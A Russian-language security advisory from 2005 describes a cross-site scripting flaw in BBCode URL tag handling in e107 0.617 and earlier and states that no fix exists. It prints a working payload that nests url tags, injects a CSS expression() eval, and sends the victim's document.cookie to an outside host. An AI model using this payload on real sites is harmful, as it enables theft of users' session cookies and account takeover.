Security Lab

Межсайтовый скриптинг при обработке BBCode тегов в e107

Дата публикации:21.07.2005
Дата изменения:17.10.2006
Всего просмотров:2334
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: e107 0.617 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке BBCode URL тегов. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

[color=#EFEFEF][url]www.ut[url=
http://www.s=''style='font-size:0;color:#
EFEFEF'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image(); i.src='http://www.
milw0rm.com/cgi-bin/shell.jpg?'+document.
cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

URL производителя: www.e107.org

Решение: Способов устранения уязвимости не существует в настоящее время.